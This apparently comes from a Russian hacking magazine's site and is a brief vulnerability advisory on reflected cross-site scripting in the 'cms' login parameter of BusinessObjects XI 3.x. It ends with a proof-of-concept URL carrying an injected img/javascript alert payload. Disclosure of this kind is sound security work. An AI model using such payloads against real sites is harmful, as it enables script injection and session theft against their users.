Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: BusinessObjects XI 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "cms" при входе в систему. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://www.monserveurBO.com/businessobjects/enterprise115/ desktoplaunch/InfoView/logon/logon.object;jsessionid= 7E1EFA4F83461F81157B67D7EA471A12?qryStr=&cmsVisible= true&authenticationVisible=true&referer=&refererFormData=& isFromLogonPage=true&cms= >%22%27> <img%20src%3d%22javascript:alert(%27XSS%20Test%20Successful%27)%22>"